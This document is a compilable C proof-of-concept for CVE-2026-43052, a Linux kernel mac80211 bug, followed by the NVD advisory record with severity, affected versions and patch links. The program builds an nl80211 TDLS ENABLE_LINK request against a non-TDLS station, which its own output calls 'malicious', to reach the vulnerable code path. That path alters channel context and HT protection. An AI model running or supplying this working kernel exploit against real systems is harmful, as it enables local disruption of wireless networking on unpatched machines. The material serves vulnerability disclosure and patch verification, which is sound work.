CVE-2026-43052

/* * PoC for CVE-2026-43052 * This PoC demonstrates sending a TDLS_SETUP request to a non-TDLS station * to trigger the missing flag check in ieee80211_tdls_oper. * Compile with: gcc -o poc_tdls poc_tdls.c -lnl-3 -lnl-genl-3 */ #include <netlink/netlink.h> #include <netlink/genl/genl.h> #include <netlink/genl/ctrl.h> #include <linux/nl80211.h> #include <stdio.h> #include <string.h> #include <unistd.h> int main(int argc, char **argv) { struct nl_sock *sock; struct nl_msg *msg; int family_id; const char *iface = "wlan0"; // Change to your wireless interface int ifindex; // 1. Allocate and connect Netlink socket sock = nl_socket_alloc(); if (!sock) { perror("nl_socket_alloc"); return -1; } if (genl_connect(sock)) { perror("genl_connect"); goto err_out; } // 2. Resolve nl80211 generic netlink family family_id = genl_ctrl_resolve(sock, "nl80211"); if (family_id < 0) { fprintf(stderr, "nl80211 not found\n"); goto err_out; } ifindex = if_nametoindex(iface); if (ifindex == 0) { perror("if_nametoindex"); goto err_out; } // 3. Construct the Netlink message msg = nlmsg_alloc(); if (!msg) { perror("nlmsg_alloc"); goto err_out; } // NL80211_CMD_TDLS_OPER genlmsg_put(msg, NL_AUTO_PID, NL_AUTO_SEQ, family_id, 0, 0, NL80211_CMD_TDLS_OPER, 0); // NL80211_ATTR_IFINDEX nla_put_u32(msg, NL80211_ATTR_IFINDEX, ifindex); // NL80211_ATTR_MAC (Target Station MAC - e.g., the AP MAC) // Using a dummy MAC here, replace with actual AP MAC for testing unsigned char mac[6] = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55}; nla_put(msg, NL80211_ATTR_MAC, 6, mac); // NL80211_ATTR_TDLS_OPERATION: NL80211_TDLS_ENABLE_LINK // This triggers the vulnerable code path on a non-TDLS station nla_put_u32(msg, NL80211_ATTR_TDLS_OPERATION, NL80211_TDLS_ENABLE_LINK); // 4. Send the message printf("Sending malicious TDLS_ENABLE_LINK operation to non-TDLS station...\n"); nl_send_auto(sock, msg); nlmsg_free(msg); err_out: nl_socket_free(sock); return 0; }

{"cve": {"id": "CVE-2026-43052", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:51.670", "lastModified": "2026-05-07T18:19:17.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mac80211: check tdls flag in ieee80211_tdls_oper\n\nWhen NL80211_TDLS_ENABLE_LINK is called, the code only checks if the\nstation exists but not whether it is actually a TDLS station. This\nallows the operation to proceed for non-TDLS stations, causing\nunintended side effects like modifying channel context and HT\nprotection before failing.\n\nAdd a check for sta->sta.tdls early in the ENABLE_LINK case, before\nany side effects occur, to ensure the operation is only allowed for\nactual TDLS peers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2", "versionEndExcluding": "6.12.81", "matchCriteriaId": "D380DB7C-C66B-4BEC-9529-5AC7B5E565D9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7d73872d949c488a1d7c308031d6a9d89b5e0a8b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8148c2fda4ebb17104a573649c9b699208ad10ee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/be81f17151fcb8546a95f35ca8f4231b065985de", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e77b2937aaa20264e4bd699d3244bdb50e7e3343", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}